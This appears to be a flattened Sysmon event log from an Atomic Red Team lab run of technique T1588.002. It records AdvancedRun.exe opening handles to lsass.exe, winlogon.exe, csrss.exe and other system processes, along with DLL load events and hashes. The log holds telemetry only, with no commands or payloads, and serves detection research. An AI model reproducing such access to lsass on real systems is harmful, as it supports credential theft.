17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983741Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983740Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983739Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983738Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983737Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983736Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983735Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983734Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983733Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983732Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983731Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983730Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003983729Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983728Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003983727Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983726Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.319{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003983725Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983724Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983723Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.319{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003983722Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 